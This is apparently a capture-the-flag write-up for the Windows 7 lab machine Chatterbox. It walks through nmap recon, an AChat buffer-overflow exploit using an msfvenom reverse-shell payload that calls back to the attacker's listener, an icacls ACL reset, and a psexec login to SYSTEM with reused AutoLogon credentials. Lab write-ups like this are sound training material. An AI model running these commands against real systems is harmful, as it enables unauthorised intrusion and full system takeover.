Recon
nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
|
└─$ nmap -T5 -A -sV -p- -Pn 10.10.10.74
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-10 16:01 CEST
Warning: 10.10.10.74 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.74
Host is up (0.041s latency).
Not shown: 65431 closed tcp ports (conn-refused), 93 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h20m00s, deviation: 2h18m34s, median: 4h59m59s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-09-10T19:03:31
|_ start_date: 2022-09-10T18:59:34
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-09-10T15:03:27-04:00
|
Here, we face a Windows 7 Pro SP1 box. We have access to a port that seems to host a http server but we can’t get anything.
1
2
|
└─$ curl http://10.10.10.74:9255/
# no output
|
dirbuster
Running dirbuster
we can’t find any files.
Vulnerabilities
The only information that we have is that we have a AChat chat system
running on port 9256.
Searching on searchsploit
we found that this service is vulnerable to a buffer overflow.
1
2
3
4
5
6
7
|
└─$ searchsploit AChat
-------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------- ---------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit) | windows/remote/36056.rb
-------------------------------------------------------- ---------------------------------
|
I tried the python exploit. We first have to modify the payload to set up a reverse shell. We can craft the payload with msfvenom
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
# create a reverse shell payload
└─$ msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp lhost=10.10.16.11 lport=4444 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
# modify exploit.py target address & payload
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# server_address = ('10.10.10.74', 9256)
# execute the exploit
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.11] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
chatterbox\alfred
C:\Users\Alfred>type Desktop\user.txt
type Desktop\user.txt
*************************ea80cce
|
We get a shell ! We can now get the user flag.
Path to the privesc
Local recon
Alfred user have all access to Administrator’s home. But we can’t get the content of the root.txt
file.
1
2
3
4
5
6
|
C:\>cd Users\Administrator\Desktop
cd Users\Administrator\Desktop
C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.
|
I first search what were the file permissions. While browsing, I found that the command icacls
is an “equivalent” to chmod
on unix. It is used to check file access control list.
I tried to reset permission with the ìcacls /reset
command and…
1
2
3
4
5
6
7
8
|
C:\Users\Administrator\Desktop>icacls root.txt /reset
icacls root.txt /reset
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files
C:\Users\Administrator\Desktop>type root.txt
type root.txt
**************************b1a8b4
|
We now have access to the flag file.
The real privesc
We can get the flag but we don’t have a nice root shell. So I run a WinPeas
scan to find some interesting informations.
1
2
3
4
|
#### Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : Alfred
DefaultPassword : Welcome1!
|
We found some default credentials on AutoLogon
. AutoLogon is a Windows tool used to authenticate users automatically using AutoLogon credentials. With those credentials we can authenticate into several users.
I tried to connect as Administrator
with the Impacket-psexec
script using the password found.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
└─$ impacket-psexec Administrator@10.10.10.74
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.74.....
[*] Found writable share ADMIN$
[*] Uploading file kqgJRiXp.exe
[*] Opening SVCManager on 10.10.10.74.....
[*] Creating service yJec on 10.10.10.74.....
[*] Starting service yJec.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
|
We are now connected as nt authority\system !
Easy, External, Network, AChat, CVE Exploitation, CVE-2015-1578, Public Vulnerabilities, Weak Credentials, CVE-2015-1577, Information Disclosure, Password Reuse